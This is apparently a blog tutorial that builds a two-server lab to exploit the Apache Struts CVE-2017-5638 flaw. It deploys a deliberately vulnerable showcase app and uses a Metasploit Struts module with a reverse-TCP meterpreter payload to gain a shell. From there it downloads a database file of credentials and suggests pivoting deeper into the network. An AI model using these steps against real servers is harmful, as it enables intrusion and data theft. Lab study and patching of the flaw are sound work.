10/7/17

Welcome back to another tutorial strut masters! Today we will be setting up two VPS servers to exploit the apache struts vulnerability, mostly famous because of the Equifax breach, ;) We will be exploiting a Tomcat webserver located in New York and firing the exploit from Singapore, sweeeeeeeeeeeeeet!

Apache Struts 2 is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model–view–controller (MVC) architecture. The WebWork framework spun off from Apache Struts aiming to offer enhancements and refinements while retaining the same general architecture of the original Struts framework. In December 2005, it was announced that WebWork 2.2 was adopted as Apache Struts 2, which reached its first full release in February 2007.

About CVE 2017-5638:
Security Researcher have discovered a new Remote Code Execution Vulnerability in Jakarta Multi-part parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 using Object Graph Navigation Language (OGNL) expressions and it is being actively exploited in the wild.

About the Exploit:- This vulnerability can be triggered if the attacker sends a modified HTTP request to upload a file to an Apache Server which uses Jakarta Multi-part parser for file upload functionality.

We will start by setting up two Ubuntu Servers on our VPS, one with TomCat for the website, and one with Metasploit for our exploit box.

1) For the Tomcat server in New York, we will be using Ubuntu 16.04 x64 OS with 1gig CPU and 512 Ram.

We are going to run the follow commands to get this going.

sudo apt-get install tomcat7
sudo apt-get install tomcat7-docs tomcat7-admin tomcat7-examples
sudo apt-get install ant git
sudo nano /etc/tomcat7/tomcat-users.xml
#Add to tomcat-users.xml
<user username="usernameyouwant" password="passwordyouwant" roles="manager-gui,admin-gui"/>
sudo service tomcat7 start

Next, we will be setting up our Exploit server located in Singapore. We will use Ubuntu 14.04 x64 with 1gig CPU and 1 gig ram, any less than 1 gig ram will give you errors starting Metasploit. We can run the following commands to get Metasploit up and running.

apt install traceroute
apt-get install software-properties-common
sudo apt-add-repository ppa:brightbox/ruby-ng
sudo apt-get update
sudo apt-get install ruby2.4 ruby2.4-dev
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
bash msfinstall
#then run msfconsole

Alright, now that we have these two running, you should see the default start Page for Tomcat at http://yourvpsip:8080 when you go here in your web browser.

If you successfully created your login accounts, you can manage your .war files and apps under
http://yourvpsip:8080/manager/html

NA

Once in this area of the site, we are going to install a vulnerable app for this exploit POC. You will download the .war file at.
https://github.com/nixawk/labs/raw/master/CVE-2017-5638/struts2_2.3.15.1-showcase.war

A .war file is the extension of a file that packages a web application directory hierarchy in ZIP format and is short for Web Archive. Java web applications are usually packaged as WAR files for deployment. These files can be created on the command line or with an IDE like Eclipse.
After you download this file upload/deploy it to the webserver.

NA

You can then go follow the URL to the vulnerable app and take a look at the default layout/the path for exploitation.

NA

Now that we have setup our two servers succesfully, we can start exploiting the vulnerable web server. Login onto the exploitbox and run msfconsole.

We will be using the exploit path located at
/multi/http/struts2_content_type_ognl

We will then need to set the payload to return a shell to our server. We will use reverse tcp
set PAYLOAD linux/x64/meterpreter/reverse_tcp
We will also need to set the RHOST (webserver ip) and LHOST (metasploit box ip)

And lastely set the targeturi
set TARGETURI /struts2_2.3.15.1-showcase/showcase.action

NA

Now that we're ready to exploit! Fire it up! AND......... EXPLOIT!

Once the exploitation is successful we can confirm we are connected to the server in New York! Now we can run any assortment of meterpreter commands and dig around for information. Notice, in the screenshot below we can see some text files (made for this POC) and download them to our exploitbox.

NA

I'd say this databse.sql file looks like it might have some interesting information, let's download it and view the content!

NA

Booy oh boy, we have some usernames and passwords it looks like! This box is definitely PWNED by this point. We can even change paths to other parts of the file system and download, upload files etc. Meterpreter has a whole set of commands and functions/scripts you can do with it. The sky's the limit once you have access to the server. You can scan other devices for smb vulnerabilities or pivot deeper into the network or whatever you can think of!

You can head on over to https://cwiki.apache.org/confluence/display/WW/S2-045 for more information on how to patch this CVE to secure your systems.

Well there you have it folks, exploiting CVE-2017-5638 from the other side of the world!!!!! I hope you enjoy this real world senerio exploit tutorial!